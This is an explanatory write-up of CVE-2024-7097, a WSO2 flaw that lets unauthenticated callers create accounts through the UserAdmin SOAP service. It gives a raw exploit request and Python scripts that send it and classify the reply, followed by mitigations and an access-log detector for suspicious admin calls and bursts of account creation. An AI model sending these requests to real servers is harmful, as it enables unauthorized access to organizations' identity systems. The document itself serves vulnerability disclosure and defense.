In June 2024, a security flaw was uncovered in several WSO2 products, technology used worldwide for identity and access management and API management. The vulnerability, tracked as CVE-2024-7097, stems from an authorization mistake in the platform's administrative SOAP services. This article breaks down how the issue arises, what it allows, and how an attacker would exploit it.

What is CVE-2024-7097?

CVE-2024-7097 is an incorrect-authorization vulnerability (the CWE-863 class) affecting several WSO2 products, including WSO2 Identity Server, API Manager, and Enterprise Integrator.

The Core Problem

Organizations can enable or disable user self-registration, which controls whether people may create their own accounts. Due to a logic flaw, the SOAP admin web service responsible for user management does not enforce this setting: a call to its user-creation operation creates the account regardless. As a result, anyone who can send a SOAP request to that service can create new accounts even when self-registration is disabled.

Prerequisites

- Network access to the target WSO2 system's SOAP admin services, which are exposed under the /services/ path (by default on the management port, 9443). No valid credentials are required.

Account Created

The platform creates the new user account. The attacker can then log in with it and use whatever privileges the assigned roles carry (for example the default roles every user receives).

Here is an example request (replace the host and values with real ones):

POST /services/UserAdmin HTTP/1.1
Host: victim-wso2-server.local
Content-Type: text/xml; charset=utf-8
SOAPAction: "urn:addUser"

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
                  xmlns:ser="http://service.user.admin.carbon.wso2.org">
   <soapenv:Header/>
   <soapenv:Body>
      <ser:addUser>
         <userName>examplehacker</userName>
         <password>VerySecret123!</password>
         <roles>everyone</roles>
         <profileName>default</profileName>
      </ser:addUser>
   </soapenv:Body>
</soapenv:Envelope>

Note that the request goes to the operation endpoint (/services/UserAdmin), not to the ?wsdl URL, which only serves the service description. Confirm the operation name, element names and namespaces against that WSDL (GET /services/UserAdmin?wsdl) for your version before relying on this request; Axis2 answers a request whose namespaces do not match with a SOAP Fault. If the request is accepted, the user examplehacker now exists even though self-registration is disabled. A void operation such as addUser is typically acknowledged with HTTP 202 Accepted and an empty body; a SOAP Fault (HTTP 500 with a soapenv:Fault element) or a 401 means the service rejected the call.

Below is a basic Python demo using requests:

import requests

# Operation endpoint of the UserAdmin admin service (not the ?wsdl URL)
target = "http://victim-wso2-server.local/services/UserAdmin"
headers = {
    "Content-Type": "text/xml; charset=utf-8",
    "SOAPAction": "urn:addUser",
}
body = '''<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
                  xmlns:ser="http://service.user.admin.carbon.wso2.org">
   <soapenv:Header/>
   <soapenv:Body>
      <ser:addUser>
         <userName>newattacker</userName>
         <password>Sneaky!Pass123</password>
         <roles>everyone</roles>
         <profileName>default</profileName>
      </ser:addUser>
   </soapenv:Body>
</soapenv:Envelope>'''

r = requests.post(target, headers=headers, data=body, timeout=10)

# Axis2 typically answers a void operation such as addUser with 202 Accepted and an
# empty body; a rejected call comes back as HTTP 500 carrying a <soapenv:Fault>.
if r.status_code in (200, 202) and "Fault" not in r.text:
    print(r.status_code, "request accepted; verify that the user now exists")
else:
    print(r.status_code, r.text)
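The snippet above treats any non-200 response as a failure, which is not how Axis2 reports results. The following added example (written for this article, not code from WSO2) builds the same addUser envelope with ElementTree, so that names containing XML-special characters are escaped instead of breaking the document, and classifies the server's answer into accepted / authentication-rejected / SOAP Fault. It assumes the namespace and element layout from the request above and that a void operation is acknowledged with 202 and an empty body; the sample fault response is constructed, not captured from a real server, and the network helper uses only the standard library.

```python
import urllib.error
import urllib.request
import xml.etree.ElementTree as ET

SOAP_NS = "http://schemas.xmlsoap.org/soap/envelope/"
# Service namespace as used in the request shown in the article; assumption, confirm
# against the service's WSDL for your product version.
SVC_NS = "http://service.user.admin.carbon.wso2.org"


def build_add_user_envelope(user_name, password, roles=("everyone",), profile="default"):
    """Build the addUser SOAP envelope. ElementTree escapes <, & and quotes in the
    values, so a user name like a<b cannot corrupt the XML."""
    ET.register_namespace("soapenv", SOAP_NS)
    ET.register_namespace("ser", SVC_NS)
    env = ET.Element(f"{{{SOAP_NS}}}Envelope")
    ET.SubElement(env, f"{{{SOAP_NS}}}Header")
    body = ET.SubElement(env, f"{{{SOAP_NS}}}Body")
    op = ET.SubElement(body, f"{{{SVC_NS}}}addUser")
    ET.SubElement(op, "userName").text = user_name
    ET.SubElement(op, "password").text = password
    for role in roles:                      # one <roles> element per role
        ET.SubElement(op, "roles").text = role
    ET.SubElement(op, "profileName").text = profile
    return ET.tostring(env, encoding="unicode")


def classify_add_user_response(status, body):
    """Map an HTTP status and body to an outcome string.
    Assumption: Axis2 acknowledges a void operation with 200/202 and an empty body;
    rejections come back as HTTP 500 carrying a soapenv:Fault with a faultstring."""
    if status in (401, 403):
        return "rejected_auth"
    if body.strip():
        try:
            root = ET.fromstring(body)
        except ET.ParseError:
            return "unknown"
        fault = root.find(f".//{{{SOAP_NS}}}Fault")
        if fault is not None:
            # SOAP 1.1 fault children are unqualified
            reason = fault.findtext("faultstring") or ""
            return "fault: " + reason.strip()
    if status in (200, 202):
        return "accepted"
    return "unknown"


def send_add_user(endpoint, envelope, timeout=10):
    """POST the envelope to the UserAdmin operation endpoint and classify the reply.
    This performs a network call and is not exercised by the offline checks below."""
    req = urllib.request.Request(
        endpoint,
        data=envelope.encode("utf-8"),
        method="POST",
        headers={"Content-Type": "text/xml; charset=utf-8", "SOAPAction": '"urn:addUser"'},
    )
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return classify_add_user_response(resp.status, resp.read().decode("utf-8", "replace"))
    except urllib.error.HTTPError as err:
        return classify_add_user_response(err.code, err.read().decode("utf-8", "replace"))


# Constructed sample fault (not captured from a real server) for the offline checks.
SAMPLE_FAULT = """<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
 <soapenv:Body><soapenv:Fault><faultcode>soapenv:Server</faultcode>
 <faultstring>Error adding user</faultstring></soapenv:Fault></soapenv:Body></soapenv:Envelope>"""

if __name__ == "__main__":
    print(build_add_user_envelope("examplehacker", "VerySecret123!"))
    print(classify_add_user_response(202, ""))              # accepted
    print(classify_add_user_response(500, SAMPLE_FAULT))    # fault: Error adding user
    print(classify_add_user_response(401, ""))              # rejected_auth
```

When testing a patched system, "rejected_auth" or a fault on an unauthenticated addUser is the expected result; "accepted" means the service still creates accounts without checking the self-registration setting.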

Impact of the Vulnerability

- Unauthorized access: Even a low-privilege account is enough for reconnaissance against the deployment and for attacking features that require any authenticated user.

- Privilege escalation: If role assignment in the request is not restricted, or another bug is reachable from an authenticated account, the attacker can chain the new account into higher privileges.

- Denial of service: Mass account creation can fill the user store, strain the database, and bury administrators in bogus sign-ups.

Mitigations

- Update immediately: the WSO2 security advisory for CVE-2024-7097 lists the patched versions.

- Limit access: do not expose the /services/ admin endpoints (the management port) to untrusted networks; restrict them to administrative hosts.

- Monitor: alert on addUser calls to the admin SOAP services from unexpected sources and on bursts of account creation.
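For the monitoring point, here is an added detection example written for this article (not a WSO2 tool). It runs over HTTP access-log lines in a Tomcat-style format and flags two things: requests to the /services/ admin endpoints from sources outside an admin allowlist (including WSDL probes, which precede an attack), and bursts of accepted POSTs to those endpoints from one source, the signature of mass account creation. The log lines, the allowlist address 10.0.0.5 and the burst threshold are all constructed assumptions; adjust the regex if your access-log pattern differs.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Tomcat-style access log: host ident user [time] "request" status bytes ... (assumed format)
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

ADMIN_SERVICE_PATH = "/services/"     # WSO2 admin SOAP services live under this path
ADMIN_SOURCES = {"10.0.0.5"}          # assumed administrative hosts (assumption)
BURST_THRESHOLD = 5                   # accepted admin POSTs from one source inside BURST_WINDOW
BURST_WINDOW = timedelta(minutes=5)


def parse_line(line):
    """Parse one access-log line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(rec["status"])
    return rec


def find_suspicious_admin_calls(lines):
    """Return findings as tuples:
    ("untrusted_source", ip, method, path) for any admin-service request from a
    non-allowlisted address, and ("burst", ip, count) when one source has at least
    BURST_THRESHOLD accepted (200/202) admin POSTs within BURST_WINDOW."""
    findings = []
    accepted_by_ip = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec is None or not rec["path"].startswith(ADMIN_SERVICE_PATH):
            continue
        if rec["ip"] not in ADMIN_SOURCES:
            findings.append(("untrusted_source", rec["ip"], rec["method"], rec["path"]))
        if rec["method"] == "POST" and rec["status"] in (200, 202):
            accepted_by_ip[rec["ip"]].append(rec["ts"])
    for ip, times in accepted_by_ip.items():
        times.sort()
        for i, start in enumerate(times):        # sliding window over accepted calls
            window = [t for t in times[i:] if t - start <= BURST_WINDOW]
            if len(window) >= BURST_THRESHOLD:
                findings.append(("burst", ip, len(window)))
                break
    return findings


# Constructed sample log (not real traffic): one admin call, a WSDL probe, five
# unauthenticated addUser calls in quick succession, and an unrelated token request.
SAMPLE_LOG = """\
10.0.0.5 - - [30/May/2025:10:15:40 +0000] "POST /services/UserAdmin HTTP/1.1" 202 - "-" "curl/8.4"
198.51.100.7 - - [30/May/2025:10:15:55 +0000] "GET /services/UserAdmin?wsdl HTTP/1.1" 200 8120 "-" "curl/8.4"
203.0.113.9 - - [30/May/2025:10:16:01 +0000] "POST /services/UserAdmin HTTP/1.1" 202 - "-" "python-requests/2.31"
203.0.113.9 - - [30/May/2025:10:16:02 +0000] "POST /services/UserAdmin HTTP/1.1" 202 - "-" "python-requests/2.31"
203.0.113.9 - - [30/May/2025:10:16:02 +0000] "POST /services/UserAdmin HTTP/1.1" 202 - "-" "python-requests/2.31"
203.0.113.9 - - [30/May/2025:10:16:03 +0000] "POST /services/UserAdmin HTTP/1.1" 202 - "-" "python-requests/2.31"
203.0.113.9 - - [30/May/2025:10:16:04 +0000] "POST /services/UserAdmin HTTP/1.1" 202 - "-" "python-requests/2.31"
10.0.0.5 - - [30/May/2025:10:21:00 +0000] "POST /oauth2/token HTTP/1.1" 200 412 "-" "curl/8.4"
"""

if __name__ == "__main__":
    for finding in find_suspicious_admin_calls(SAMPLE_LOG.splitlines()):
        print(finding)
```

The burst rule is deliberately independent of the allowlist: a compromised or misused administrative host creating accounts in bulk is worth an alert too, and the access log shows it even when the admin audit log is not shipped to the SIEM.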

References

- WSO2 Security Advisory: CVE-2024-7097
- NVD Entry for CVE-2024-7097
- WSO2 UserAdmin SOAP API Docs

Summary

CVE-2024-7097 is a logic bug in WSO2's SOAP admin services that lets anyone who can reach them create user accounts, even when self-registration is meant to be off. If you run affected WSO2 products, apply the patched versions from the advisory, keep the /services/ admin endpoints off untrusted networks, and watch for unexpected account creation.

Timeline

Published on: 05/30/2025 15:15:40 UTC
Last modified on: 05/30/2025 17:15:28 UTC